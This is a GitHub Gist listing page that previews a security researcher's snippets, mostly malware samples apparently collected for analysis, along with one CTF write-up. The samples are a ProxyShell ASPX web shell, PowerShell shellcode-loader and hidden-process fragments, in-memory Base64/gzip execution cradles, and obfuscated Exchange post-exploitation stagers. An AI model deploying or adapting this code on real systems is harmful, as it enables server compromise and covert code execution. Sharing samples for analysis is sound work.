Skip to content

Instantly share code, notes, and snippets.

View JohnHammond's full-sized avatar

John Hammond JohnHammond

10.5k followers · 13 following
View GitHub Profile
@JohnHammond
JohnHammond / powershell_invoke.ps1
Created May 3, 2021 23:11
$t6Y = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll CreateThread), (b9MW @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$sC6US,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll WaitForSingleObject), (b9MW @([IntPtr], [Int32]))).Invoke($t6Y,0xffffffff) | Out-Null
@JohnHammond
JohnHammond / proxyshell_xsl_transform.cs
Created August 21, 2021 05:53
<%@ Page Language="C#" %><% var c=new System.Xml.XmlDocument();c.LoadXml(@"<root>1</root>");var b=new System.Xml.XmlDocument();b.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["REDACTED"])));var xct=new System.Xml.Xsl.XslCompiledTransform();xct.Load(b,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());xct.Transform(c,null,new System.IO.MemoryStream()); %>
@JohnHammond
JohnHammond / solve_classic_passwd.sh
Created February 8, 2021 02:30
Writeup to TryHackMe's "Classic Passwd" challenge
# Run ltrace
ltrace ./Challenge.Challenge
# Enter a bogus username to see the `strcmp` instruction and see the correct answer.
# Get the flag
echo "AGB6js5d9dkG7" | ./Challenge.Challenge
@JohnHammond
JohnHammond / 188.166.162.201_update.png.ps1
Created March 6, 2021 05:47
Microsoft Exchange Post-Exploitation Stager 03
This file has been truncated, but you can view the full file.
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0q2trY9+8d7Og51fQv9++vCX/OL7n977Jb949+HuAf37AB/sfnqwRx/v0m979/Hpwf19+nd37wH9e+8Bfr//EO2oIQHZx+d7Ow+55R7B2tu7j08ePqR/9+/vMZhP0fweQN6/j9YH+2ixTx/f2wOoA3y8u7sD4Pce7uDfe3jz4QG62MGvDw7o9YOH6OAeUN57AJQPGO979/Diw08B+/4+Wu9+uo8v6YMHD/aAE+O9t4tP9zH2h/fw770H1OLeAY+Jh8GfPtz5FN/tE2Z7B7v8Isixt/8p4wRc7+2g408PQJNP76H5w/v06qeAvftgj4f3KX+8Q7g+fAgcuN2DByD3AQhLOOH3e3jn/qfUwT0M4P7eLndO/wLzfQznIbp/uA+ou59S630A2eOWB8CVSCsvAeruHn3ykGdiB8jvMZY04HsYO/Vw8Cn9/QBw97nVp5jBTxnnXfRxAFrt7e9SR/dADwIIAHsA8OkuxrDLY3gA0t//lIe2C0I8xL/3QdIDoL+3u8Nsgn8Jb559JtgeBnb/HpA9OMDgMdcPgMXBAWi2Q589uIeWuyDq7kOewp0dgvApyLl3IKQFczxk9j1gPPe510+ZJUC++/hqB1TavbfDfMe0BdX39h8QVg93gdp9JtvOfSB7nyXgITj7ocwRhIEEg5lo54D/Red74C1hjgd4/x7Itfspt4N0fMpcvMd4PWC+fgCZ293H7NAr6PhTxn0XuO4e7DDRMV6aWEa
@JohnHammond
JohnHammond / powershell_quiet.ps1
Created May 3, 2021 23:08
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
@JohnHammond
JohnHammond / 188.166.162.201_update_stager.ps1
Created March 6, 2021 05:49
Microsoft Exchange Post-Exploitation Stager 04
This file has been truncated, but you can view the full file.
((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189
@JohnHammond
JohnHammond / initial_foothold.bat
Last active January 6, 2023 19:40
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr]
::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{=
'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar
guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe
ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]
::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y
KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM
jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc
OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM
s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen
@JohnHammond
JohnHammond / powershell_process_starter.ps1
Created May 3, 2021 23:07
$s = New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName = $b;
$s.Arguments='-noni -nop -w hidden -c
@JohnHammond
JohnHammond / stage5_deobfuscated_188.166.162.201_update.png.ps1
Created March 6, 2021 07:03
Microsoft Exchange Post-Exploitation Artifacts stage #5
This file has been truncated, but you can view the full file.
function make_smb1_anonymous_login_packet {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x48
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
@JohnHammond
JohnHammond / powershell_data.ps1
Created May 3, 2021 23:08
&([scriptblock]::create((
New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream((
New-Object IO.MemoryStream(,
[Convert]::FromBase64String(
''...BASE64GZIPDATA...''
))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))